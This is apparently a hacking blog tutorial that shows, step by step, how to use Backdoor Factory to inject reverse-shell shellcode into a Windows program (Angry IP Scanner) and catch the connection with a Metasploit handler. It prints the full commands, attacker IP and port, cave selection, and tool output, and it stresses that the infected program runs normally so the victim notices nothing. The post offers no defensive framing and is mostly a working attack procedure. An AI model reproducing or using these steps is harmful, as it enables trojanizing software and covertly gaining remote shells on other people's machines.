Backdoor factory – How to inject shell-code into windows application

Backdoor factory (BDF) is a pre-installed application in Kali Linux, its used to inject shell-code to any windows application. BDF can inject custom shell-code to an existing binary by adding malicious code in between the genuine source code. First it scans the entire binary and checks compatible payloads then it searches the entire code and displays available caves where our malicious code can reside without affecting the working of the application. Code caves are generated by compilers. A code compiler will have to pad certain areas of the binary and it does so by padding with a whole series of 0x00 bytes known as code caves. Backdoor factory overwrites those code caves with shell-code. We can choose any of the caves and make the executable.

 The infected application will work as its intended but the shell-code will be executed in the background. No suspicious activity will be noticed by the normal user. This can target any windows system regardless of the version. This tool is being used by hackers to attack the victim other than the msfvenom payload generator. The working is same as the msfvenom payload, you need to setup reverse handler in msfcosole for a reverse connection and wait for the victim to connect back. Personally i prefer this method over the old windows hacking technique.

However this wont work on protected applications, most of the windows app is vulnerable to this attack. First of all you need to pick a light weight portable executable. Here im injecting code to  “Angry IP scanner”.  follow the steps .

Video Demo

Step 1

Choose any application and use backdoor factory to check for available payloads

# backdoor-factory -f “application.exe” -s show

it will show up like this.

root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s show
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactoryVersion: 3.0.5[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded
root@anonymous:~/Desktop#

 

Step 2

now choose one of the shell-code and inject it into the executable with attacker IP and Port for reverse connection

# backdoor-factory -f  “application.exe” -s reverse_shell_tcp_inline -H “attacker_IP” -P 444
root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s reverse_shell_tcp_inline -H 192.168.1.101 -P 444
-.(`-‘) (`-‘) _ <-.(`-‘) _(`-‘) (`-‘) __( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
‘-‘—.\ / ,—. \-,—–.’-‘. ,–.\ .’_ (`-‘)—-. (`-‘)—-. ,——,)
| .-. (/ | \ /`.\ | .–./| .’ /’`’-..__)( OO).-. ‘( OO).-. ‘| /`. ‘
| ‘-‘ `.) ‘-‘|_.’ | /_) (`-‘)| /)| | ‘ |( _) | | |( _) | | || |_.’ |
| /`’. |(| .-. | || |OO )| . ‘ | | / : \| |)| | \| |)| || . .’
| ‘–‘ / | | | |(_’ ‘–‘\| |\ \| ‘-‘ / ‘ ‘-‘ ‘ ‘ ‘-‘ ‘| |\ \
`——‘ `–‘ `–‘ `—–‘`–‘ ‘–‘`——‘ `—–‘ `—–‘ `–‘ ‘–‘
(`-‘) _ (`-‘) (`-‘)
.-> <-.(OO ) .->
(`-‘)—–./ ,—. \-,—–./ ‘._ (`-‘)—-. ,——,) ,–.’ ,-.
(OO|(_\—‘| \ /`.\ | .–./|’–…__)( OO).-. ‘| /`. ‘(`-‘)’.’ /
/ | ‘–. ‘-‘|_.’ | /_) (`-‘)`–. .–‘( _) | | || |_.’ |(OO \ /
\_) .–‘(| .-. | || |OO ) | | \| |)| || . .’ | / /)
`| |_) | | | |(_’ ‘–‘\ | | ‘ ‘-‘ ‘| |\ \ `-/ /`
`–‘ `–‘ `–‘ `—–‘ `–‘ `—–‘ `–‘ ‘–‘ `–‘Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactoryVersion: 3.0.5[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 366
[*] All caves lengths: 366
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don’t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 366
[*] Available caves:
1. Section Name: None;Section Begin: None End: None; Cave begin:0x26c End: 0x3fc; Cave Size:400
2. Section Name: .text;Section Begin: 0x400 End: 0x4e00; Cave begin:0x4c30 End: 0x4dfc; Cave Size: 460
3. Section Name: .rdata;Section Begin: 0x5000 End: 0x5600; Cave begin:0x545e End: 0x55fc; Cave Size:414
4. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe398 End: 0xe580; Cave Size:488
5. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe598 End: 0xe784; Cave Size:492
6. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe79c End: 0xe984; Cave Size:488
7. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe9a0 End: 0xeb84; Cave Size:484
8. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeba4 End: 0xed84; Cave Size:480
9. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeda8 End: 0xef88; Cave Size:480
10. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xefac End: 0xf188; Cave Size:476
11. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf1ac End: 0xf388; Cave Size:476
12. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf3b0 End: 0xf588; Cave Size:472
13. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf5b4 End: 0xf78c; Cave Size:472
14. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf7b8 End: 0xf98c; Cave Size:468
15. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf9bc End: 0xfb8c; Cave Size:464
16. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfbc0 End: 0xfd90; Cave Size:464
17. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfdc0 End: 0xff90; Cave Size:464
18. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000;Cave begin:0xffc4 End: 0x10190;Cave Size:460
19. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x101c8 End: 0x10390;Cave Size:456
20. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x10410 End: 0x10594;Cave Size:388
22. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x1e0a0 End: 0x1e2ec;Cave Size:588
23. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x22e21 End: 0x22ffc;Cave Size:475
**************************************************
[!] Enter your selection:

 

All the available caves will be shown and will prompt for user input. Choose any cave.

 

[!] Enter your selection: 11
[!] Using selection: 11
[*] Changing flags for section: .rsrc
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File ip-scanner.exe is in the ‘backdoored’ directory

 

Step 3

The backdoored file will be generated in the “backdoor” folder. now you can setup msfcosole payload handler. Choose same payload,port,IP that you have chosen for BDF

# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.101:444
[*] Starting the payload handler…

Step 4

Execute the binary in the target machine a shell will be pwned

As i mentioned before the executable will work fine and the code will be executed in the background. Watch the video for better idea. Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.

susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

You may also like...

1 Response

  1. Gema says:

    This command turns the backdoor factory in a hunt and shellcode inject type of mechinism.

Leave a Reply

Your email address will not be published. Required fields are marked *